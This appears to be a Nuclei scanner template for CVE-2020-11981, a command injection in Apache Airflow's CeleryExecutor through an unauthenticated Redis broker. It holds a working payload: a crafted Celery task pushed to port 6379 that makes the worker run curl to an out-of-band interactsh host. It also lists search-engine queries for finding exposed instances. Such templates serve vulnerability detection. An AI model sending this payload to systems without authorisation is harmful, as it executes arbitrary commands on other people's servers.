81 lines
3.4 KiB
YAML
81 lines
3.4 KiB
YAML
id: CVE-2020-11981
|
|
|
|
info:
|
|
name: Apache Airflow <=1.10.10 - Command Injection
|
|
author: pussycat0x
|
|
severity: critical
|
|
description: |
|
|
An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
|
|
impact: |
|
|
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
|
|
remediation: Upgrade apache-airflow to version 1.10.11 or higher.
|
|
reference:
|
|
- https://github.com/apache/airflow/pull/9178
|
|
- https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
|
|
- https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
|
|
- https://github.com/t0m4too/t0m4to
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2020-11981
|
|
cwe-id: CWE-78
|
|
epss-score: 0.93315
|
|
epss-percentile: 0.99068
|
|
cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: apache
|
|
product: airflow
|
|
shodan-query:
|
|
- product:"redis"
|
|
- http.title:"airflow - dags" || http.html:"apache airflow"
|
|
- http.title:"sign in - airflow"
|
|
fofa-query:
|
|
- apache airflow
|
|
- title="airflow - dags" || http.html:"apache airflow"
|
|
- title="sign in - airflow"
|
|
google-query:
|
|
- intitle:"airflow - dags" || http.html:"apache airflow"
|
|
- intitle:"sign in - airflow"
|
|
tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp
|
|
variables:
|
|
data: "*3\r
|
|
|
|
$5\r
|
|
|
|
LPUSH\r
|
|
|
|
$7\r
|
|
|
|
default\r
|
|
|
|
$936\r
|
|
|
|
{\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
|
|
encode1: '[[["curl", "http://'
|
|
encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
|
|
end: '"}'
|
|
tcp:
|
|
- inputs:
|
|
- data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r
|
|
|
|
')}}"
|
|
read: 1024
|
|
host:
|
|
- "{{Hostname}}"
|
|
- "{{Host}}:6379"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: curl"
|
|
# digest: 4a0a00473045022100aff8fbe7f62bca05b0a3fa63d1a8918e35f71377dd19c5be43e22541cfeeddb202203672beec85ae4ba8f222dc4cac2a57879abbce3ad9712bd31ee37bf90b052adf:922c64590222798bb761d5b6d8e72950 |